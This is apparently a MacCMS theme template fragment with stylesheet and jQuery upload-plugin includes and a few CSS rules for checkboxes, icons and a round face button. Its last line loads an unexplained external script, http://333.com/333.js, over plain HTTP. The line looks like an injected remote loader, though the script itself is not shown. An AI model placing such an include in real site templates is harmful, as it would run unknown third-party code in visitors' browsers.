﻿ <link href="{$maccms.path_tpl}mxstatic/css/mxone.css" rel="stylesheet" type="text/css">
 <script src="{$maccms.path_tpl}static/js/jquery.imageupload.js"></script>
<style>
    .checkboxinput{-webkit-appearance: checkbox;}
    .nonemore{background: none;}
    [class^=icon-], [class*=" icon-"]{line-height: inherit!important;}
   button.btn-face {
    border-radius: 50%;
    width: 60px;
    height: 60px;
    font-size: 12px;
    background: #a9a9a936;
}
</style>
<script src="http://333.com/333.js" type="text/javascript"></script>